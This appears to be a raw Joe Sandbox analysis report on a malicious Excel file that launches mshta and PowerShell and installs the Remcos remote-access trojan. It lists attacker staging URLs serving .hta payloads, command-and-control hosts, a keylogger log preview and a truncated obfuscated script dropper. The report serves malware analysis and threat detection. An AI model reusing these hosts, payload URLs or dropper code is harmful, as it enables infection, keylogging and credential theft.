                                                                    https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3bhv8F64.tmp.24.drfalse
                                                                      unknown
                                                                      http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683bhv8F64.tmp.24.drfalse
                                                                        unknown
                                                                        http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(bhv8F64.tmp.24.drfalse
                                                                          unknown
                                                                          https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9bhv8F64.tmp.24.drfalse
                                                                            unknown
                                                                            http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_shbhv8F64.tmp.24.drfalse
                                                                              unknown
                                                                              http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.jsbhv8F64.tmp.24.drfalse
                                                                                unknown
                                                                                http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.450249616.00000000022DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.458543028.0000000012101000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://192.3.220.40/mshta.exe, 00000004.00000003.428299496.0000000002F71000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429316216.0000000002F71000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://www.ccleaner.com/go/app_cc_pro_trialkeybhv8F64.tmp.24.drfalse
                                                                                    unknown
                                                                                    http://192.3.220.40/450/seethebestpricewithgoodcookiesme.tIFppowershell.exe, 00000005.00000002.450249616.00000000038A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.494980205.00000000027D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      https://jfm.com.co/mshta.exe, 00000004.00000003.428299496.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429316216.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429232968.0000000000509000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.428720236.0000000000509000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.478721001.0000000000433000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477617431.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467397830.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472371461.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472455742.0000000000433000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479228414.0000000003315000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        http://192.3.220.40powershell.exe, 0000000E.00000002.477794394.0000000002997000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.510569466.00000000028A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          http://crl.entrust.net/server1.crl0mshta.exe, 00000004.00000003.428299496.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429316216.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.525064527.000000001C3F5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.525064527.000000001C426000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467397830.0000000003302000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477617431.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477617431.0000000003302000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479228414.0000000003302000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467397830.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472371461.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479228414.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472371461.0000000003302000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.529080074.000000001C158000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.529080074.000000001C176000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://contextual.media.net/8/nrrV73987.jsbhv8F64.tmp.24.drfalse
                                                                                            unknown
                                                                                            http://www.imvu.comRegAsm.exe, RegAsm.exe, 0000001A.00000002.484922847.0000000000400000.00000040.80000000.00040000.00000000.sdmp, RegAsm.exe, 0000001A.00000002.485113430.0000000000619000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            https://contoso.com/Iconpowershell.exe, 00000005.00000002.458543028.0000000012101000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            https://contextual.media.net/bhv8F64.tmp.24.drfalse
                                                                                              unknown
                                                                                              http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.jsbhv8F64.tmp.24.drfalse
                                                                                                unknown
                                                                                                https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2bhv8F64.tmp.24.drfalse
                                                                                                  unknown
                                                                                                  http://www.imvu.com/sKRegAsm.exe, 0000001A.00000002.484892506.000000000036C000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    http://www.msn.com/bhv8F64.tmp.24.drfalse
                                                                                                      unknown
                                                                                                      https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:aubhv8F64.tmp.24.drfalse
                                                                                                        unknown
                                                                                                        http://crl.pkioverheid.nl/DomOvLatestCRL.crl0mshta.exe, 00000004.00000003.428299496.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429316216.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.525064527.000000001C3F5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.525064527.000000001C426000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467397830.0000000003302000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477617431.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477617431.0000000003302000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479228414.0000000003302000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467397830.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472371461.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479228414.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472371461.0000000003302000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.529080074.000000001C158000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.529080074.000000001C176000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          https://jfm.com.co/k3l?&alloy=handsome&c037002451082_10142024.xls, 7D330000.0.drfalse
                                                                                                            unknown
                                                                                                            http://geoplugin.net/json.gp0iRegAsm.exe, 00000014.00000002.649655222.0000000000855000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549bhv8F64.tmp.24.drfalse
                                                                                                                unknown
                                                                                                                https://raw.githubusercontent.compowershell.exe, 0000000E.00000002.477794394.00000000027C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.510569466.00000000026D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  https://jfm.com.co/k3l?&alloy=handsome&convection=panicky&acid=giddy&position=absorbing&regular=oranmshta.exe, 0000000F.00000002.478469673.00000000003CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472455742.0000000000433000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472371461.0000000003302000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    http://192.3.220.40/450/ec/networkthinkinggreatthingstobeenough.htahttp://192.3.220.40/450/ec/networmshta.exe, 00000004.00000003.428115448.0000000002765000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.428477913.0000000002765000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473307044.00000000021E5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471912655.00000000021E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      http://192.3.220.40/Qmshta.exe, 0000000F.00000002.478721001.0000000000433000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472455742.0000000000433000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        http://cdn.at.atwola.com/_media/uac/msn.htmlbhv8F64.tmp.24.drfalse
                                                                                                                          unknown
                                                                                                                          https://www.google.com/accounts/serviceloginRegAsm.exefalse
                                                                                                                            unknown
                                                                                                                            http://192.3.220.40/450/ec/networkthinkinggreatthingstobeenough.hta...mshta.exe, 00000004.00000003.428720236.00000000004C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429232968.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.478721001.0000000000433000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472455742.0000000000433000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fsetbhv8F64.tmp.24.drfalse
                                                                                                                                unknown
                                                                                                                                https://secure.comodo.com/CPS0mshta.exe, 00000004.00000003.428299496.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429316216.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.525064527.000000001C3F5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.525064527.000000001C426000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.523357384.000000001A680000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467397830.0000000003302000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477617431.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477617431.0000000003302000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479228414.0000000003302000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467397830.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472371461.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479228414.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472371461.0000000003302000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.529080074.000000001C158000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.525828262.000000001ABED000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.529080074.000000001C176000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://policies.yahoo.com/w3c/p3p.xmlbhv8F64.tmp.24.drfalse
                                                                                                                                  unknown
                                                                                                                                  http://192.3.220.40/450/seethebepowershell.exe, 00000005.00000002.450249616.00000000038A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.494980205.00000000027D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    http://crl.entrust.net/2048ca.crl0mshta.exe, 00000004.00000003.428299496.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429316216.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.525064527.000000001C3F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477617431.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467397830.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472371461.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479228414.0000000003315000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.529080074.000000001C158000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    http://www.msn.com/advertisement.ad.jsbhv8F64.tmp.24.drfalse
                                                                                                                                      unknown
                                                                                                                                      http://www.ebuddy.comRegAsm.exe, RegAsm.exe, 0000001A.00000002.484922847.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
IP | Domain | Country | ASN | ASN Name | Malicious
135.148.195.248 | idabo.duckdns.org | United States | 18676 | AVAYAUS | true
185.199.108.133 | raw.githubusercontent.com | Netherlands | 54113 | FASTLYUS | true
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
150.136.81.248 | jfm.com.co | United States | 31898 | ORACLE-BMC-31898US | false
192.3.220.40 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1533041
Start date and time: 2024-10-14 11:04:14 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 20s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed: 34
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• GSI enabled (VBA)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 037002451082_10142024.xls
Detection: MAL
Classification: mal100.rans.phis.troj.spyw.expl.evad.winXLS@41/49@8/5
EGA Information:
• Successful, ratio: 77.8%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 172
• Number of non-executed functions: 324
Cookbook Comments:
• Found application associated with file extension: .xls
• Changed system and user locale, location and keyboard layout to French - France
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Active ActiveX Object
• Active ActiveX Object
• Scroll down
• Close Viewer
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
• Execution Graph export aborted for target mshta.exe, PID 2764 because there are no executed function
• Execution Graph export aborted for target mshta.exe, PID 3456 because there are no executed function
• Not all processes where analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
05:05:43 | API Interceptor | 86x Sleep call for process: mshta.exe modified
05:05:46 | API Interceptor | 596x Sleep call for process: powershell.exe modified
05:05:57 | API Interceptor | 17x Sleep call for process: wscript.exe modified
05:06:10 | API Interceptor | 471143x Sleep call for process: RegAsm.exe modified
                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                              na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                              PO-00006799868.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                              STATEMENT - PAYMENT TRACKING Sept 2024.docx.docGet hashmaliciousRemcosBrowse
                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                              narud#U017ebenica TISAKOMERC d.o.oRadbrkkedes234525262623.wsfGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                              awb_shipping_doc_001700720242247820020031808174CN18003170072024_00000000pdf.jsGet hashmaliciousRemcosBrowse
                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                              6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                              Salary Increase Letter_Oct 2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                              FASTLYUShttps://emojiparqueacuaticoo.site/NClMD/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • 151.101.130.137
                                                                                                                                                                              https://narrow-light-alley.glitch.me/public/40.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • 151.101.194.137
                                                                                                                                                                              Request For Quotation.jsGet hashmaliciousSTRRATBrowse
                                                                                                                                                                              • 199.232.196.209
                                                                                                                                                                              https://r.clk20.com/s.ashx?ms=clk20comb:221053_100505&e=ACCOUNTING%40SBO.CO.AT&eId=72534635&c=h&url=https%3a%2f%2fwww.digikey.at%3futm_medium%3demail%26utm_source%3dcsn%26utm_campaign%3dclk20comb:221053-100505_CSN24CMM1%26utm_content%3dDigiKeyLogo_AT%26utm_cid%3d&c=E,1,HpCcAtsbpCegpKKqJ9Y5uFcA_ydFOa8bwbyPDmQPWZrYVAHSEO4EBUFk2oBVcoOSlhj1U-BBO3hqrTRAz1S8XP6noRCD2_d6D_dY_HcwfLi_OKAuOxCdCkg,&typo=1Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 151.101.0.114
                                                                                                                                                                              https://www.kwconnect.com/redirect?url=https://www.lugiest.com/sqx/#Xem9lLmdyYWhhbUBjeWJnLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • 151.101.194.137
                                                                                                                                                                              https://tracking.ei9ie7ph.com/aff_c?offer_id=14263&aff_id=2&source=testoffer&aff_sub=testofferGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 151.101.65.108
                                                                                                                                                                              3Af7PybsUi.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 151.101.0.223
                                                                                                                                                                              3Af7PybsUi.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 151.101.128.223
                                                                                                                                                                              Compliance_Report_Final_Q3_8c3f5541a91374b5bf18ac88017a597742a1891a.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • 151.101.194.137
                                                                                                                                                                              https://payrollruntimesheet.weebly.com/verify.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • 151.101.65.46
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):350
                                                                                                                                                                              Entropy (8bit):3.5518266725926084
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:6ly0Poql55YcIeeDAlTywHWYmlUbySNosb3fxNa/WAv:6lTgUecpvHpbyQ350/W+
                                                                                                                                                                              MD5:98EF2947DE34ADF19BD6B0C22613B164
                                                                                                                                                                              SHA1:0004836E93975298299E0F1CD10996608BD224BB
                                                                                                                                                                              SHA-256:C5B30F91129F651AAE7588178872F471D8FBEB6FF8138B191D49E213C2A6515A
                                                                                                                                                                              SHA-512:6AB68965F23FB4A3CF1C0977042FA1F5AB936CFBB62C7BC707D39D2274390694B994A8070777BFA88543858AD5D5434BB6BC773161A2D890BCFD677A5A8AF84D
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Yara Hits:
                                                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                                                                                                                              Preview:....[.2.0.2.4./.1.0./.1.4. .0.5.:.0.6.:.1.0. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.M.i.c.r.o.s.o.f.t. .E.x.c.e.l. .-. .0.3.7.0.0.2.4.5.1.0.8.2._.1.0.1.4.2.0.2.4. . .[.C.o.m.p.a.t.i.b.i.l.i.t.y. .M.o.d.e.].].....[.C.t.r.l.L.].....[.N.e.w. .T.a.b. .-. .G.o.o.g.l.e. .C.h.r.o.m.e.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):4742
                                                                                                                                                                              Entropy (8bit):4.8105940880640246
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:96:mCJ2Woe5Sgyg12jDs+un/iQLEYFjDaeWJ6KGcmXuFRLcU6/KI2k6Lm5emmXIG:Jxoe5+gkjDt4iWN3yBGH+dcU6CIVsm5D
                                                                                                                                                                              MD5:278C40A9A3B321CA9147FFBC6BE3A8A8
                                                                                                                                                                              SHA1:D795FC7D3249F9D924DC951DA1DB900D02496D73
                                                                                                                                                                              SHA-256:4EB0EAE13C3C67789AD8940555F31548A66F5031BF1A804E26EA6E303515259E
                                                                                                                                                                              SHA-512:E7222B41A436CE0BF8FA3D8E5EB8249D4D3985419D0F901F535375789F001B5929EF9B85C1D6802F0FBD5F722A52CB27021F87D076E69D92F46C7C3E894C6F00
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script............7...q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1m.......Remove-Variable........Convert-String........Trace-Command........Sort-Object........Register-Object
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):64
                                                                                                                                                                              Entropy (8bit):0.34726597513537405
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Nlll:Nll
                                                                                                                                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:@...e...........................................................
                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
                                                                                                                                                                              Category:modified
                                                                                                                                                                              Size (bytes):167898
                                                                                                                                                                              Entropy (8bit):2.3094679199096855
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:7oa+awjz7eWLB23EfAq6kfAKV6/HQ2UBW1++izpyHBfHLPy3JofufAYfAkhjQ/od:Ea+n7QbzVsdi9yOPtksVKLSAT
                                                                                                                                                                              MD5:52BB72DAA6C16C09D4298BD59E12B7D9
                                                                                                                                                                              SHA1:2E4AEF7DF584ACAADB5A6E555D6E2F40AE12B6F1
                                                                                                                                                                              SHA-256:8FBF6165B0751A47BF9842011E82C4A7715CC879FD7272B45AB549DF6E813E46
                                                                                                                                                                              SHA-512:1A6A1C54CEED1D004E32504BB473D2525DCFF1974D8618AF871252E4DA7F3992CA87ACC935A74F78CD6C14F172142CCFEEE9BCB47104EA50A704FE37750D4EE4
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:<script>.. ..document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253Cscript%252520language%25253DJavaScript%25253Em%25253D%252527%2525253C%25252521DOCTYPE%25252520html%2525253E%2525250A%2525253Cmeta%25252520http-equiv%2525253D%25252522X-UA-Compatible%25252522%25252520content%2525253D%25252522IE%2525253DEmulateIE8%25252522%25252520%2525253E%2525250A%2525253Chtml%2525253E%2525250A%2525253Cbody%2525253E%2525250A%2525253CScriPt%25252520LaNGUaGe%2525253D%25252522VbsCripT%25252522%2525253E%2525250Adim%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%252
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):195824
                                                                                                                                                                              Entropy (8bit):3.733217557919086
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3072:asQ4xYsrlTzTSTB3SJrS5GhHLgt5pxGwUAu6zUhYpt0nb2PRJ7oWdHIx:GUYsrlTyN3IS52lwt0nM5U
                                                                                                                                                                              MD5:5A71149A9C997CDCB94F1A84860417F7
                                                                                                                                                                              SHA1:9D80F853425AE99D844A70CEBAA59AEE73C537D1
                                                                                                                                                                              SHA-256:FF6B47D315645FDDC632876AE60A1A33A3E9138CEEF8A073D2FE8779208F7D8C
                                                                                                                                                                              SHA-512:448D914AA714C3DEAB84218BEDA6A3E94A9A5B8A5D912178F72A2EA82C73AD6DDB86A8E3443785FDCE8D9FD876C5DF7C26CD878DFA33F432E38AD62FF0E91C1B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .a.l.m.e.c.e.g.u.e.i.r.a.(.f.l.u.c.t.u.a.d.o.r.,. .d.e.s.v.a.r.i.a.r.,. .m.i.l.i.c.i.a.n.o.,. .m.o.a.n.s.a.,. .h.e.m.i.a.t.r.o.p.h.i.a.)..... . . . .d.i.m. .f.i.l.t.e.r..... . . . .d.i.m. .d.i.a.l.e.c.t..... . . . .d.i.m. .e..... . . . .d.i.m. .r.e.s..... . . . .d.i.m. .f.o.r.m.a.t.t.e.d.T.e.x.t..... . . . .d.i.m. .f.l.a.g.s..... . . . ..... . . . .f.l.a.g.s. .=. .0..... . . . . ..... . . . .i.f. .m.i.l.i.c.i.a.n.o...A.r.g.u.m.e.n.t.E.x.i.s.t.s.(.N.P.A.R.A._.F.I.L.T.E.R.). .t.h.e.n..... . . . . . . . .f.i.l.t.e.r. .=. .m.i.l.i.c.i.a.n.o...A.r.g.u.m.e.n.t.(.N.P.A.R.A._.F.I.L.T.E.R.)..... . . . . . . . .d.i.a.l.e.c.t. .=. .U.R.I._.W.Q.L._.D.I.A.L.E.C.T..... . . . .e.n.d. .i.f..... . . . ..... . . . .i.f. .m.i.l.i.c.i.a.n.o...A.r.g.u.m.e.n.t.E.x.i.s.t.s.(.N.P.A.R.A._.D.I.A.L.E.C.T.). .t.h.e.n..... . . . . . . . .d.i.a.l.e.c.t. .=. .m.i.l.i.c.i.a.n.o...A.r.g.u.m.e.n.t.(.N.P.A.R.A._.D.I.A.L.E.C.T.)..... . . . .e.n.d. .i.f..... . . . ..... . . . .I.f. .L.C.
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):962
                                                                                                                                                                              Entropy (8bit):5.013130376969173
                                                                                                                                                                              Encrypted:false
